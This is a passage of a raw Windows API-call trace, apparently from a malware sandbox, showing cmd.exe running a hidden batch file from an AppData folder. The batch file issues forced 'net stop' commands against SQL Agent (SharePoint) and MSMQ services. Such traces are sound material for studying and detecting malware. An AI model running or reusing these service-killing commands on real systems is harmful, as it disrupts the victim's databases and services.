lpFindFileData=0x3be6b8) returned 0xffffffff [0204.364] GetLastError () returned 0x2 [0204.365] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.365] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0204.365] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0204.365] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.366] GetLastError () returned 0x2 [0204.366] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0204.366] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0204.366] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.366] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0204.366] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0204.367] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0204.367] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0204.367] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$SHAREPOINT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$SHAREPOINT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$SHAREPOINT /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xbd8, dwThreadId=0xb80)) returned 1 [0204.371] CloseHandle (hObject=0x78) returned 1 [0204.371] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0204.371] GetProcessHeap () returned 0x3e0000 [0204.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.371] GetEnvironmentStringsW () returned 0x3f8408* [0204.371] GetProcessHeap () returned 0x3e0000 [0204.371] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.371] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.371] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0204.515] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0204.515] CloseHandle (hObject=0x74) returned 1 [0204.515] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0204.515] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0204.515] GetProcessHeap () returned 0x3e0000 [0204.515] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.516] GetEnvironmentStringsW () returned 0x3f8408* [0204.516] GetProcessHeap () returned 0x3e0000 [0204.516] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.516] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.516] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.516] GetProcessHeap () returned 0x3e0000 [0204.516] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.516] GetEnvironmentStringsW () returned 0x3f8408* [0204.516] GetProcessHeap () returned 0x3e0000 [0204.516] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.516] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.516] GetProcessHeap () returned 0x3e0000 [0204.516] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0204.516] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0204.516] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.516] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0204.517] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.517] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0204.517] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.517] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0204.517] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.517] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0204.517] SetConsoleInputExeNameW () returned 0x1 [0204.517] GetConsoleOutputCP () returned 0x1b5 [0204.517] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0204.517] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0204.518] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0204.518] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.518] SetFilePointer (in: hFile=0x74, lDistanceToMove=3796, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xed4 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0204.518] GetProcessHeap () returned 0x3e0000 [0204.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0204.519] GetProcessHeap () returned 0x3e0000 [0204.519] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0204.519] GetProcessHeap () returned 0x3e0000 [0204.519] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0204.519] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.519] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xed4 [0204.519] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x9ed, lpOverlapped=0x0) returned 1 [0204.519] SetFilePointer (in: hFile=0x74, lDistanceToMove=3826, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xef2 [0204.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=30, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop NetMsmqActivator /y\r\ny\r\n/y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 30 [0204.519] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.519] GetFileType (hFile=0x74) returned 0x1 [0204.519] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.519] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xef2 [0204.519] GetProcessHeap () returned 0x3e0000 [0204.519] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0204.519] GetProcessHeap () returned 0x3e0000 [0204.519] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0204.523] _tell (_FileHandle=3) returned 3826 [0204.523] _close (_FileHandle=3) returned 0 [0204.523] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0204.523] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0204.523] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0204.523] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0204.523] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0204.523] _wcsicmp (_String1="net", _String2="CD") returned 11 [0204.523] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0204.523] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0204.523] _wcsicmp (_String1="net", _String2="REN") returned -4 [0204.523] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0204.523] _wcsicmp (_String1="net", _String2="SET") returned -5 [0204.523] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0204.523] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0204.523] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0204.523] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0204.523] _wcsicmp (_String1="net", _String2="MD") returned 1 [0204.523] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0204.523] _wcsicmp (_String1="net", _String2="RD") returned -4 [0204.523] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0204.523] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0204.523] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0204.523] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0204.523] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0204.523] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0204.523] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0204.523] _wcsicmp (_String1="net", _String2="VER") returned -8 [0204.523] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0204.523] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0204.523] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0204.524] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0204.524] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0204.524] _wcsicmp (_String1="net", _String2="START") returned -5 [0204.524] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0204.524] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0204.524] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0204.524] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0204.524] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0204.524] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0204.524] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0204.524] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0204.524] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0204.524] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0204.524] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0204.524] SetErrorMode (uMode=0x0) returned 0x1 [0204.524] GetProcessHeap () returned 0x3e0000 [0204.524] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0204.524] GetProcessHeap () returned 0x3e0000 [0204.524] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0204.525] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.525] GetProcessHeap () returned 0x3e0000 [0204.525] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0204.525] GetProcessHeap () returned 0x3e0000 [0204.525] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0204.525] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0204.525] GetProcessHeap () returned 0x3e0000 [0204.525] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0204.525] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.525] GetProcessHeap () returned 0x3e0000 [0204.525] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0204.526] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0204.526] GetProcessHeap () returned 0x3e0000 [0204.526] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0204.526] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.526] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.527] GetLastError () returned 0x2 [0204.527] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.527] GetLastError () returned 0x2 [0204.527] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.528] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.528] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.528] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.528] GetLastError () returned 0x2 [0204.529] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.529] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.529] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.530] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0204.530] SetErrorMode (uMode=0x0) returned 0x1 [0204.530] GetProcessHeap () returned 0x3e0000 [0204.530] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0204.530] GetProcessHeap () returned 0x3e0000 [0204.530] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0204.530] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.530] GetProcessHeap () returned 0x3e0000 [0204.530] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0204.530] GetProcessHeap () returned 0x3e0000 [0204.530] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0204.531] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0204.531] GetProcessHeap () returned 0x3e0000 [0204.531] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0204.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.531] GetProcessHeap () returned 0x3e0000 [0204.531] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0204.531] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0204.531] GetProcessHeap () returned 0x3e0000 [0204.531] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0204.531] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.532] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.532] GetLastError () returned 0x2 [0204.532] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.532] GetLastError () returned 0x2 [0204.533] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.533] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0204.533] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0204.534] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.534] GetLastError () returned 0x2 [0204.535] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0204.535] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0204.535] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.535] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0204.535] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0204.535] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0204.536] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0204.536] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop NetMsmqActivator /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop NetMsmqActivator /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop NetMsmqActivator /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x550, dwThreadId=0x150)) returned 1 [0204.540] CloseHandle (hObject=0x74) returned 1 [0204.540] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0204.540] GetProcessHeap () returned 0x3e0000 [0204.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.540] GetEnvironmentStringsW () returned 0x3f8408* [0204.540] GetProcessHeap () returned 0x3e0000 [0204.540] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.540] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.540] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0204.670] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0204.670] CloseHandle (hObject=0x78) returned 1 [0204.670] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0204.670] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0204.670] GetProcessHeap () returned 0x3e0000 [0204.670] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.670] GetEnvironmentStringsW () returned 0x3f8408* [0204.670] GetProcessHeap () returned 0x3e0000 [0204.670] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.671] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.671] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.671] GetProcessHeap () returned 0x3e0000 [0204.671] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.671] GetEnvironmentStringsW () returned 0x3f8408* [0204.671] GetProcessHeap () returned 0x3e0000 [0204.671] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.671] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.671] GetProcessHeap () returned 0x3e0000 [0204.671] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0204.671] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0204.671] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.671] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0204.672] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.672] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0204.672] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.672] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0204.672] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.672] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0204.672] SetConsoleInputExeNameW () returned 0x1 [0204.672] GetConsoleOutputCP () returned 0x1b5 [0204.672] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0204.672] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.673] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0204.673] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0204.673] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.673] SetFilePointer (in: hFile=0x78, lDistanceToMove=3826, 